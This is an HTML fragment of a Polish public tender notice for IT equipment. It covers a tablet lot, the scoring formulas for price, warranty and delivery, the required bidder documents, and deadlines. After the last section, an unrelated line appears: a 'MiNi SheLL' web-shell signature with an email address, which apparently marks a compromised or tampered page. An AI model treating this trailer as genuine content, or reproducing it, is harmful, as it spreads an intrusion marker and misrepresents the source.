innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 7 – Tablet z akcesoriami zgodny z OPZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213200-7 - Komputer tablet</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48620000-0 - Systemy operacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla zadań nr 2, 3, 4, 5, 6 i 7.<br/>a.	Cena brutto oferty „C” - 60 %<br/>b.	Okres udzielonej gwarancji „G” -30 %<br/>c.	Termin dostawy „D” - 10 %.<br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami:<br/>a)	dla kryterium – Cena brutto oferty „C”: <br/><br/> C N<br/>C = -------- x 60 pkt.<br/> Co<br/><br/> gdzie:<br/>C – wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) badanego zadania spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>b)	dla kryterium – Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 24 miesiące). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 24 miesiące, maksymalny 48 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 48 miesięcy, ocenie będzie podlegał okres 48 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 24 miesięcy oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punkty w niniejszym kryterium zostaną przyznane za wydłużenie czasu obejmowania sprzętu gwarancją powyżej 24 miesięcy od daty dostarczenia przedmiotu umowy potwierdzonej podpisanym bez zastrzeżeń protokołem odbioru przedmiotu zamówienia, zgodnie z załącznikiem nr 3 do projektu umowy. <br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 24≤ 35 miesięcy – 0 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 36 ≤ 47 miesięcy – 15 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 48 miesięcy – 30 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 24 miesięcznej gwarancji.<br/><br/>c)	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej). <br/>	Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 30 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty w których zostanie zaproponowany termin dostawy krótszy niż 30 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 15 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca w przedziale 16 ÷ 29 dni kalendarzowych deklarowanego „Terminu dostawy” – 5 punktów;<br/>	oferta zawierająca 30 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Maksymalny Termin dostawy wynosi 30 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy.<br/>	W przypadku gdy Wykonawca zadeklaruje „Termin dostawy” dłuższy niż 30 dni kalendarzowych od daty zawarcia umowy oferta Wykonawcy będzie podlegała odrzuceniu.<br/><br/>d) łączna ilość punktów ocenianej oferty (łączna punktacja): <br/><br/>W = C +G +D<br/><br/>gdzie: <br/>W – łączna wartość punktowa przyznana ocenianej ofercie w ocenie końcowej<br/>C – wartość punktowa za Cenę brutto oferty „C”<br/>G – wartość punktowa za Okres udzielonej gwarancji „G”<br/>D – wartość punktowa za Termin dostawy „D”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	świadczenie Wykonawcy, że oferowane produkty są zgodne z Opisem przedmiotu zamówienia (OPZ) i spełniają wymagania postawione przez Zamawiającego w SWZ – wymagane dla zadania nr: 1÷7.<br/>2.	Oświadczenie, że w razie awarii uszkodzony dysk twardy pozostaje u Zamawiającego – wymagane dla zadania nr: 1.<br/>3.	Oświadczenie Wykonawcy potwierdzające, że serwis będzie realizowany przez Autoryzowanego Partnera Serwisowego Producenta lub bezpośrednio przez Producenta – wymagane dla zadania nr: 1, 3, 4, 5, 6 i 7.<br/>4.	Oświadczenie Wykonawcy w zakresie oferowanego oprogramowania, że jest podmiotem uprawnionym do udzielenia licencji i dostawy oferowanego oprogramowania, a dostarczone oprogramowanie jest wolne od wad prawnych i fizycznych oraz że jest zgodne z zaleceniami, normami i obowiązującymi wymaganiami techniczno-eksploatacyjnymi na terenie RP –wymagane dla zadania nr 1.<br/>5.	Aktualny wydruk ze strony: https://www.cpubenchmark.net potwierdzający wymagania z SWZ (dot. Procesora) lub wydruk z przeprowadzonych testów wykonanych na zaproponowanym przez Wykonawcę sprzęcie potwierdzający wymagania z SWZ (dot. Procesora) (dopuszcza się wydruk w języku angielskim) wymagany dla zadania nr 1 i 7.<br/>6.	Certyfikat ISO 9001 dla producenta sprzętu (dopuszcza się wydruk w języku angielskim) – wymagany dla zadania nr 1.<br/>7.	Deklaracja zgodności CE dla zaoferowanego sprzętu (dopuszcza się wydruk w języku angielskim) – wymagana dla zadania nr 1.<br/>8.	Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta jednostki (dopuszcza się wydruk w języku angielskim) – wymagany dla zadania nr 1.<br/>9.	Certyfikat ISO 9001:2000 na świadczenie usług serwisowych (dopuszcza się wydruk w języku angielskim) – wymagany dla zadania nr 1.<br/>UWAGA!<br/>Zamawiający na podstawie art. 20 ust. 3 ustawy Pzp wyraża zgodę na złożenie dokumentów wymienionych w ppkt. 5); 6); 7); 8) i 9) w języku angielskim bez tłumaczenia na język polski. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1.	świadczenie Wykonawcy, że oferowane produkty są zgodne z Opisem przedmiotu zamówienia (OPZ) i spełniają wymagania postawione przez Zamawiającego w SWZ – wymagane dla zadania nr: 1÷7.<br/>2.	Oświadczenie, że w razie awarii uszkodzony dysk twardy pozostaje u Zamawiającego – wymagane dla zadania nr: 1.<br/>3.	Oświadczenie Wykonawcy potwierdzające, że serwis będzie realizowany przez Autoryzowanego Partnera Serwisowego Producenta lub bezpośrednio przez Producenta – wymagane dla zadania nr: 1, 3, 4, 5, 6 i 7.<br/>4.	Oświadczenie Wykonawcy w zakresie oferowanego oprogramowania, że jest podmiotem uprawnionym do udzielenia licencji i dostawy oferowanego oprogramowania, a dostarczone oprogramowanie jest wolne od wad prawnych i fizycznych oraz że jest zgodne z zaleceniami, normami i obowiązującymi wymaganiami techniczno-eksploatacyjnymi na terenie RP –wymagane dla zadania nr 1.<br/>5.	Aktualny wydruk ze strony: https://www.cpubenchmark.net potwierdzający wymagania z SWZ (dot. Procesora) lub wydruk z przeprowadzonych testów wykonanych na zaproponowanym przez Wykonawcę sprzęcie potwierdzający wymagania z SWZ (dot. Procesora) (dopuszcza się wydruk w języku angielskim) wymagany dla zadania nr 1 i 7.<br/>6.	Certyfikat ISO 9001 dla producenta sprzętu (dopuszcza się wydruk w języku angielskim) – wymagany dla zadania nr 1.<br/>7.	Deklaracja zgodności CE dla zaoferowanego sprzętu (dopuszcza się wydruk w języku angielskim) – wymagana dla zadania nr 1.<br/>8.	Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta jednostki (dopuszcza się wydruk w języku angielskim) – wymagany dla zadania nr 1.<br/>9.	Certyfikat ISO 9001:2000 na świadczenie usług serwisowych (dopuszcza się wydruk w języku angielskim) – wymagany dla zadania nr 1.<br/>UWAGA!<br/>Zamawiający na podstawie art. 20 ust. 3 ustawy Pzp wyraża zgodę na złożenie dokumentów wymienionych w ppkt. 5); 6); 7); 8) i 9) w języku angielskim bez tłumaczenia na język polski. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1) Formularz ofertowy (oferta)<br/>2) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>3) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych wspólnie przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4) Oświadczenie Wykonawcy o niepodleganiu wkluczeniu z postępowania <br/>5) Przedmiotowe środki dowodowe wymienione w Sekcji V pkt 5.8 Ogłoszenia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Przed podpisaniem umowy wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru oferty jako<br/>najkorzystniejszej) przedstawią zamawiającemu kopię umowy regulującej współpracę tych wykonawców.<br/>2. Oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania. W przypadku wspólnego ubiegania się o<br/>zamówienie przez wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z wykonawców.<br/>3. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik. Pełnomocnictwo dla pełnomocnika do<br/>reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka<br/>cywilna) – dotyczy ofert składanych przez wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony przewidują możliwość dokonania zmian w treści umowy w przypadku zmiany stawki podatku VAT w trakcie obowiązywania umowy w zakresie cen jednostkowych oraz wartości Umowy <br/>o różnicę wynikającą ze zmiany wartości podatku VAT, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia. <br/>2. Każda zmiana Umowy pod rygorem nieważności nastąpi w formie pisemnego aneksu do Umowy po uprzednim złożeniu pisemnego wniosku przez jedną ze stron. Wniosek winien zawierać uzasadnienie faktyczne i prawne. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-25 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania:<br/>- dla zadania 1 – max 15 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy;<br/>- dla zadań 2, 3, 4, 5, 6 i 7 – max 30 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy.<br/><br/>Dotyczy Sekcji II pkt 2.14 i 2.15 Ogłoszenia – dotyczy wyłącznie Zadnia nr 1

Creat By MiNi SheLL
Email: jattceo@gmail.com